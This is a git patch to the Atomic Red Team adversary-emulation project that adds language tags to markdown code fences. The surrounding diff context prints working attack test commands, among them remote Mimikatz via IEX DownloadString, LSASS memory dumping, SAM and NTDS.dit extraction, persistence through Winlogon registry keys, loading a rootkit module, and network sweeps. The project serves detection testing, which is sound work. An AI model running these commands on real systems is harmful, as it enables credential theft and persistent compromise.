From 6ec7d4bcf0a34ae03ae58704d125f3db42d4d9bb Mon Sep 17 00:00:00 2001 
From: Carrie Roberts Date: Mon, 16 Mar 2020 08:46:25 -0600 Subject: [PATCH] Specify language for markdown code blocks (#882) * specify code block type in markdown * specify code block type in markdown --- atomic_red_team/atomic_doc_template.md.erb | 21 +- atomics/T1002/T1002.md | 45 +- atomics/T1003/T1003.md | 145 +- atomics/T1004/T1004.md | 18 +- atomics/T1005/T1005.md | 4 +- atomics/T1007/T1007.md | 10 +- atomics/T1009/T1009.md | 4 +- atomics/T1010/T1010.md | 11 +- atomics/T1012/T1012.md | 4 +- atomics/T1014/T1014.md | 12 +- atomics/T1015/T1015.md | 6 +- atomics/T1016/T1016.md | 27 +- atomics/T1018/T1018.md | 32 +- atomics/T1022/T1022.md | 23 +- atomics/T1023/T1023.md | 10 +- atomics/T1027/T1027.md | 14 +- atomics/T1028/T1028.md | 20 +- atomics/T1030/T1030.md | 4 +- atomics/T1031/T1031.md | 6 +- atomics/T1032/T1032.md | 4 +- atomics/T1033/T1033.md | 8 +- atomics/T1035/T1035.md | 13 +- atomics/T1036/T1036.md | 51 +- atomics/T1037/T1037.md | 30 +- atomics/T1038/T1038.md | 6 +- atomics/T1040/T1040.md | 16 +- atomics/T1042/T1042.md | 4 +- atomics/T1044/T1044.md | 4 +- atomics/T1046/T1046.md | 8 +- atomics/T1047/T1047.md | 24 +- atomics/T1048/T1048.md | 12 +- atomics/T1049/T1049.md | 12 +- atomics/T1050/T1050.md | 22 +- atomics/T1053/T1053.md | 22 +- atomics/T1055/T1055.md | 31 +- atomics/T1056/T1056.md | 6 +- atomics/T1057/T1057.md | 8 +- atomics/T1058/T1058.md | 4 +- atomics/T1059/T1059.md | 4 +- atomics/T1060/T1060.md | 18 +- atomics/T1062/T1062.md | 4 +- atomics/T1063/T1063.md | 20 +- atomics/T1064/T1064.md | 10 +- atomics/T1065/T1065.md | 8 +- atomics/T1069/T1069.md | 16 +- atomics/T1070/T1070.md | 30 +- atomics/T1071/T1071.md | 34 +- atomics/T1073/T1073.md | 6 +- atomics/T1074/T1074.md | 14 +- atomics/T1075/T1075.md | 13 +- atomics/T1076/T1076.md | 15 +- atomics/T1077/T1077.md | 16 +- atomics/T1081/T1081.md | 16 +- atomics/T1082/T1082.md | 32 +- atomics/T1083/T1083.md | 16 +- atomics/T1084/T1084.md | 6 +- atomics/T1085/T1085.md | 44 +- atomics/T1086/T1086.md | 
66 +- atomics/T1087/T1087.md | 44 +- atomics/T1088/T1088.md | 36 +- atomics/T1089/T1089.md | 116 +- atomics/T1090/T1090.md | 12 +- atomics/T1093/T1093.md | 6 +- atomics/T1095/T1095.md | 17 +- atomics/T1096/T1096.md | 10 +- atomics/T1097/T1097.md | 4 +- atomics/T1098/T1098.md | 4 +- atomics/T1099/T1099.md | 28 +- atomics/T1100/T1100.md | 11 +- atomics/T1101/T1101.md | 4 +- atomics/T1102/T1102.md | 12 +- atomics/T1103/T1103.md | 4 +- atomics/T1105/T1105.md | 46 +- atomics/T1107/T1107.md | 56 +- atomics/T1110/T1110.md | 4 +- atomics/T1112/T1112.md | 40 +- atomics/T1113/T1113.md | 16 +- atomics/T1114/T1114.md | 6 +- atomics/T1115/T1115.md | 10 +- atomics/T1117/T1117.md | 22 +- atomics/T1118/T1118.md | 88 +- atomics/T1119/T1119.md | 20 +- atomics/T1121/T1121.md | 16 +- atomics/T1123/T1123.md | 4 +- atomics/T1124/T1124.md | 8 +- atomics/T1126/T1126.md | 12 +- atomics/T1127/T1127.md | 9 +- atomics/T1128/T1128.md | 4 +- atomics/T1130/T1130.md | 4 +- atomics/T1132/T1132.md | 4 +- atomics/T1134/T1134.md | 4 +- atomics/T1135/T1135.md | 16 +- atomics/T1136/T1136.md | 30 +- atomics/T1138/T1138.md | 21 +- atomics/T1139/T1139.md | 4 +- atomics/T1140/T1140.md | 12 +- atomics/T1141/T1141.md | 8 +- atomics/T1142/T1142.md | 4 +- atomics/T1143/T1143.md | 4 +- atomics/T1144/T1144.md | 4 +- atomics/T1145/T1145.md | 18 +- atomics/T1146/T1146.md | 24 +- atomics/T1147/T1147.md | 4 +- atomics/T1148/T1148.md | 4 +- atomics/T1152/T1152.md | 4 +- atomics/T1153/T1153.md | 8 +- atomics/T1154/T1154.md | 4 +- atomics/T1155/T1155.md | 4 +- atomics/T1156/T1156.md | 8 +- atomics/T1158/T1158.md | 52 +- atomics/T1163/T1163.md | 4 +- atomics/T1164/T1164.md | 4 +- atomics/T1165/T1165.md | 6 +- atomics/T1166/T1166.md | 18 +- atomics/T1168/T1168.md | 8 +- atomics/T1169/T1169.md | 4 +- atomics/T1170/T1170.md | 18 +- atomics/T1173/T1173.md | 4 +- atomics/T1174/T1174.md | 9 +- atomics/T1179/T1179.md | 9 +- atomics/T1180/T1180.md | 4 +- atomics/T1183/T1183.md | 12 +- atomics/T1191/T1191.md | 18 +- 
atomics/T1193/T1193.md | 4 +- atomics/T1196/T1196.md | 9 +- atomics/T1197/T1197.md | 16 +- atomics/T1201/T1201.md | 38 +- atomics/T1202/T1202.md | 8 +- atomics/T1204/T1204.md | 33 +- atomics/T1206/T1206.md | 8 +- atomics/T1208/T1208.md | 4 +- atomics/T1214/T1214.md | 8 +- atomics/T1215/T1215.md | 6 +- atomics/T1216/T1216.md | 14 +- atomics/T1217/T1217.md | 20 +- atomics/T1218/T1218.md | 62 +- atomics/T1219/T1219.md | 4 +- atomics/T1220/T1220.md | 30 +- atomics/T1222/T1222.md | 64 +- atomics/T1223/T1223.md | 13 +- atomics/T1482/T1482.md | 12 +- atomics/T1485/T1485.md | 31 +- atomics/T1489/T1489.md | 16 +- atomics/T1490/T1490.md | 20 +- atomics/T1496/T1496.md | 4 +- atomics/T1500/T1500.md | 11 +- atomics/T1501/T1501.md | 6 +- atomics/T1502/T1502.md | 11 +- atomics/T1504/T1504.md | 6 +- atomics/T1505/T1505.md | 11 +- atomics/T1518/T1518.md | 8 +- atomics/T1519/T1519.md | 6 +- atomics/T1529/T1529.md | 36 +- atomics/T1531/T1531.md | 20 +- atomics/index.yaml | 1844 ++++++++++---------- 155 files changed, 2784 insertions(+), 1720 deletions(-) diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb index 834f742b..0ce1c6c6 100644 --- a/atomic_red_team/atomic_doc_template.md.erb +++ b/atomic_red_team/atomic_doc_template.md.erb 
@@ -41,28 +41,39 @@ end.join(', ') %> #### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%> -``` +<%def get_language(executor) + language = executor + if executor == "command_prompt" + language = "cmd" + elsif executor == "manual" + language = "" + end + language +end%> + +```<%= get_language(test['executor']['name']) %> <%= test['executor']['command'].to_s.strip %> ``` <%- end -%> <%- if test['executor']['cleanup_command'] != nil -%> #### Cleanup Commands: -``` +```<%= get_language(test['executor']['name']) %> <%= test['executor']['cleanup_command'].to_s.strip %> ``` <%- end -%> <% if test['dependencies'].to_a.count > 0 %> -#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`! +<% dependency_executor = test['executor']['name'] %> +#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`! <% test['dependencies'].each do | dep | -%> ##### Description: <%= dep['description'].strip! %> ##### Check Prereq Commands: -``` +```<%= get_language(dependency_executor) %> <%= dep['prereq_command'].strip! %> ``` ##### Get Prereq Commands: -``` +```<%= get_language(dependency_executor) %> <%= dep['get_prereq_command'].strip! %> ``` <% end -%> diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md index 58011709..e8e428eb 100644 --- a/atomics/T1002/T1002.md +++ b/atomics/T1002/T1002.md 
@@ -31,12 +31,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `powershell`! -``` + + +```powershell dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} ``` #### Cleanup Commands: -``` +```powershell Remove-Item -path #{output_file} -ErrorAction Ignore ``` @@ -64,24 +66,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd "#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension} ``` #### Cleanup Commands: -``` +```cmd del /f /q /s #{output_file} >nul 2>&1 ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Rar tool must be installed at specified location (#{rar_exe}) ##### Check Prereq Commands: -``` +```cmd if not exist "#{rar_exe}" (exit /b 1) ``` ##### Get Prereq Commands: -``` +```cmd echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} echo Follow the installer prompts to install Winrar @@ -108,24 +113,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `sh`! -``` + + +```sh zip #{output_file} #{input_files} ``` #### Cleanup Commands: -``` +```sh rm -f #{output_file} ``` + #### Dependencies: Run with `sh`! ##### Description: Files to zip must exist (#{input_files}) ##### Check Prereq Commands: -``` +```sh ls #{input_files} ``` ##### Get Prereq Commands: -``` +```sh echo Please set input_files argument to include files that exist ``` 
@@ -149,12 +157,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `sh`! -``` + + +```sh test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file}) ``` #### Cleanup Commands: -``` +```sh rm -f #{input_file}.gz ``` @@ -179,24 +189,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `sh`! -``` + + +```sh tar -cvzf #{output_file} #{input_file_folder} ``` #### Cleanup Commands: -``` +```sh rm -f #{output_file} ``` + #### Dependencies: Run with `sh`! ##### Description: Folder to zip must exist (#{input_file_folder}) ##### Check Prereq Commands: -``` +```sh test -e #{input_file_folder} ``` ##### Get Prereq Commands: -``` +```sh echo Please set input_file_folder argument to a folder that exists ``` diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 597255fc..73280a50 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -179,7 +179,9 @@ Dumps credentials from memory via Powershell by invoking a remote mimikatz scrip #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds ``` 
@@ -206,20 +208,23 @@ Dump credentials from memory using Gsecdump #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd #{gsecdump_exe} -a ``` + #### Dependencies: Run with `powershell`! ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){ @@ -249,20 +254,23 @@ Dump credentials from memory using Windows Credential Editor from https://www.am #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd #{wce_exe} -o #{output_file} ``` + #### Dependencies: Run with `powershell`! ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{wce_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ 
@@ -287,14 +295,16 @@ via three registry keys. Then processed locally using https://github.com/Neohaps #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg save HKLM\sam %temp%\sam reg save HKLM\system %temp%\system reg save HKLM\security %temp%\security ``` #### Cleanup Commands: -``` +```cmd del %temp%\sam >nul 2> nul del %temp%\system >nul 2> nul del %temp%\security >nul 2> nul @@ -322,24 +332,27 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd #{procdump_exe} -accepteula -ma lsass.exe #{output_file} ``` #### Cleanup Commands: -``` +```cmd del "#{output_file}" >nul 2> nul ``` + #### Dependencies: Run with `powershell`! ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null 
@@ -395,20 +408,23 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd #{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit ``` + #### Dependencies: Run with `powershell`! ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null @@ -416,11 +432,11 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force ``` ##### Description: Lsass dump must exist at specified location (#{input_file}) ##### Check Prereq Commands: -``` +```powershell cmd /c "if not exist #{input_file} (exit /b 1)" ``` ##### Get Prereq Commands: -``` +```powershell Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" ``` @@ -445,20 +461,23 @@ subsequent domain controllers without the need of network-based replication. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: -``` +```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: -``` +```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` 
@@ -481,20 +500,23 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd vssadmin.exe create shadow /for=#{drive_letter} ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: -``` +```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: -``` +```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` 
@@ -522,46 +544,49 @@ This test must be executed on a Windows Domain Controller. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE ``` #### Cleanup Commands: -``` +```cmd del "#{extract_path}\ntds.dit" >nul 2> nul del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: -``` +```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: -``` +```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` ##### Description: Volume shadow copy must exist ##### Check Prereq Commands: -``` +```cmd if not exist #{vsc_name} (exit /b 1) ``` ##### Get Prereq Commands: -``` +```cmd echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement ``` ##### Description: Extract path must exist ##### Check Prereq Commands: -``` +```cmd if not exist #{extract_path} (exit /b 1) ``` ##### Get Prereq Commands: -``` +```cmd mkdir #{extract_path} ``` 
@@ -579,20 +604,23 @@ Look for the encrypted cpassword value within Group Policy Preference files on t #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd findstr /S cpassword %logonserver%\sysvol\*.xml ``` + #### Dependencies: Run with `powershell`! ##### Description: Computer must be domain joined ##### Check Prereq Commands: -``` +```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Joining this computer to a domain must be done manually ``` @@ -616,31 +644,34 @@ Look for the encrypted cpassword value within Group Policy Preference files on t #### Attack Commands: Run with `powershell`! -``` + + +```powershell . #{gpp_script_path} Get-GPPPassword -Verbose ``` + #### Dependencies: Run with `powershell`! ##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} ##### Check Prereq Commands: -``` +```powershell if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } ``` ##### Get Prereq Commands: -``` +```powershell New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" ``` ##### Description: Computer must be domain joined ##### Check Prereq Commands: -``` +```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Joining this computer to a domain must be done manually ``` 
@@ -659,38 +690,41 @@ Parses secrets hidden in the LSASS process with python. Similar to mimikatz's se #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd pypykatz live lsa ``` + #### Dependencies: Run with `powershell`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -``` +```powershell if (python --version) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell echo "Python 3 must be installed manually" ``` ##### Description: Computer must have pip installed ##### Check Prereq Commands: -``` +```powershell if (pip3 -V) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell echo "PIP must be installed manually" ``` ##### Description: pypykatz must be installed and part of PATH ##### Check Prereq Commands: -``` +```powershell if (cmd /c pypykatz -h) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell pip3 install pypykatz ``` @@ -708,38 +742,41 @@ Parses registry hives to obtain stored credentials #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd pypykatz live registry ``` + #### Dependencies: Run with `powershell`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -``` +```powershell if (python --version) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell echo "Python 3 must be installed manually" ``` ##### Description: Computer must have pip installed ##### Check Prereq Commands: -``` +```powershell if (pip3 -V) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell echo "PIP must be installed manually" ``` ##### Description: pypykatz must be installed and part of PATH ##### Check Prereq Commands: -``` +```powershell if (cmd /c pypykatz -h) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell pip3 install pypykatz ``` 
diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md index 93014434..7529105f 100644 --- a/atomics/T1004/T1004.md +++ b/atomics/T1004/T1004.md @@ -34,12 +34,14 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit #### Attack Commands: Run with `powershell`! -``` + + +```powershell Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore ``` @@ -63,12 +65,14 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along #### Attack Commands: Run with `powershell`! -``` + + +```powershell Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore ``` @@ -92,13 +96,15 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force ``` #### Cleanup Commands: -``` +```powershell Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore ``` diff --git a/atomics/T1005/T1005.md b/atomics/T1005/T1005.md index 833aa76c..c1c5dd80 100644 --- a/atomics/T1005/T1005.md +++ b/atomics/T1005/T1005.md 
@@ -25,7 +25,9 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified #### Attack Commands: Run with `sh`! -``` + + +```sh cd ~/Library/Cookies grep -q "#{search_string}" "Cookies.binarycookies" ``` diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index e1a79fdf..e78e03ba 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -19,7 +19,9 @@ Identify system services #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd tasklist.exe sc query sc query state= all @@ -46,12 +48,14 @@ Enumerates started system services using net.exe and writes them to a file. This #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net.exe start >> #{output_file} ``` #### Cleanup Commands: -``` +```cmd del /f /q /s #{output_file} >nul 2>&1 ``` diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md index f0a22977..3e1d9080 100644 --- a/atomics/T1009/T1009.md +++ b/atomics/T1009/T1009.md @@ -25,7 +25,9 @@ Uses dd to add a zero to the binary to change the hash #### Attack Commands: Run with `sh`! -``` + + +```sh dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} ``` diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index 52d3187c..98633e2c 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md 
@@ -25,25 +25,28 @@ Compiles and executes C# code to list main window titles associated with each pr #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} #{output_file_name} ``` #### Cleanup Commands: -``` +```cmd del /f /q /s #{output_file_name} >nul 2>&1 ``` + #### Dependencies: Run with `powershell`! ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{input_source_code}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" ``` diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 65f9c9f7..d663b351 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -30,7 +30,9 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_ #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 5b0ee20c..b6e73e15 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -28,7 +28,9 @@ Loadable Kernel Module based Rootkit #### Attack Commands: Run with `sh`! -``` + + +```sh sudo insmod #{rootkit_file} ``` @@ -53,7 +55,9 @@ Loadable Kernel Module based Rootkit #### Attack Commands: Run with `sh`! -``` + + +```sh sudo modprobe #{rootkit_file} ``` 
@@ -85,7 +89,9 @@ It would be wise if you only run this in a test environment #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd puppetstrings #{driver_path} ``` diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md index 242b244d..ca1d7601 100644 --- a/atomics/T1015/T1015.md +++ b/atomics/T1015/T1015.md @@ -39,7 +39,9 @@ Attaches cmd.exe to a list of processes. Configure your own Input arguments to a #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $input_table = "#{parent_list}".split(",") $Name = "Debugger" $Value = "#{attached_process}" @@ -59,7 +61,7 @@ Foreach ($item in $input_table){ ``` #### Cleanup Commands: -``` +```powershell $input_table = "#{parent_list}".split(",") Foreach ($item in $input_table) { diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 34293e98..ae4904db 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -27,7 +27,9 @@ Identify network configuration information #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd ipconfig /all netsh interface show arp -a @@ -51,7 +53,9 @@ Enumerates Windows Firewall Rules using netsh. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd netsh advfirewall firewall show rule name=all ``` @@ -71,7 +75,9 @@ Identify network configuration information #### Attack Commands: Run with `sh`! -``` + + +```sh arp -a netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c ifconfig @@ -93,7 +99,9 @@ Identify network configuration information as seen by Trickbot and described her #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd ipconfig /all net config workstation net view /all /domain @@ -124,7 +132,9 @@ https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-wi #### Attack Commands: Run with `powershell`! -``` + + +```powershell $ports = Get-content #{port_file} $file = "#{output_file}" $totalopen = 0 
@@ -154,19 +164,20 @@ Write-Host $results ``` #### Cleanup Commands: -``` +```powershell Remove-Item -ErrorAction ignore "#{output_file}" ``` + #### Dependencies: Run with `powershell`! ##### Description: Test requires #{port_file} to exist ##### Check Prereq Commands: -``` +```powershell if (Test-Path "#{port_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" ``` diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 356369ff..e587ce77 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -48,7 +48,9 @@ Identify remote systems with net.exe #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net view /domain net view ``` @@ -69,7 +71,9 @@ Identify remote systems with net.exe querying the Active Directory Domain Comput #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net group "Domain Computers" /domain ``` @@ -94,7 +98,9 @@ Identify domain controllers for specified domain. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd nltest.exe /dclist:#{target_domain} ``` @@ -114,7 +120,9 @@ Identify remote systems via ping sweep #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i ``` @@ -134,7 +142,9 @@ Identify remote systems via arp #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd arp -a ``` @@ -154,7 +164,9 @@ Identify remote systems via arp #### Attack Commands: Run with `sh`! -``` + + +```sh arp -a | grep -v '^?' ``` @@ -174,7 +186,9 @@ Identify remote systems via ping sweep #### Attack Commands: Run with `sh`! -``` + + +```sh for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done ``` 
